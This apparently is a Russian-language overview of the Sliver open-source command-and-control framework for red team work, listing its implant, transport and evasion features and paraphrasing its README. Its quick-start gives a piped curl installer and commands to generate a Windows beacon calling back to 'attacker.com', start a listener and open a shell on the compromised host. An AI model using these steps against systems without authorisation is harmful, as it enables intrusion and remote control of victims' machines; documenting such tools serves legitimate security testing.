Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, macOS (Go-based, кросс-компиляция) - Транспорты: mTLS, WireGuard, HTTP/S, DNS - Генерация стейджеров, shellcode, DLL - Мультипользовательский режим: командная работа операторов - BOF (Beacon Object Files) поддержка - Интеграция с Armory: каталог сторонних расширений - OPSEC-фичи: sleep, jitter, process injection
# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell
Sliver — это открытый кроссплатформенный фреймворк для эмуляции противника/команды Red Team, который могут использовать организации любого размера для проведения тестирования на безопасность. Импланты Sliver поддерживают C2-каналы через mTLS, WireGuard, HTTP(S) и DNS и компилируются динамически с использованием асимметричных ключей шифрования для каждого бинарного файла.
Сервер и клиент поддерживают MacOS, Windows и Linux. Импланты поддерживаются в MacOS, Windows и Linux (и, возможно, во всех целевых платформах компилятора Golang, но мы не все их тестировали).
Посетите https://sliver.sh/, чтобы получить доступ к учебным пособиям и документации.
Скачайте последний релиз и обратитесь к вики Sliver для краткого руководства по базовой настройке и использованию. Чтобы получить самую последнюю версию, соберите из исходного кода.
curl https://sliver.sh/install|sudo bash, а затем запустите sliver
Пожалуйста, ознакомьтесь с вики или начните обсуждение в GitHub.
См. вики.
Sliver лицензирован под лицензией GPLv3, некоторые подкомпоненты могут иметь отдельные лицензии. Подробности см. в соответствующих подкаталогах этого проекта.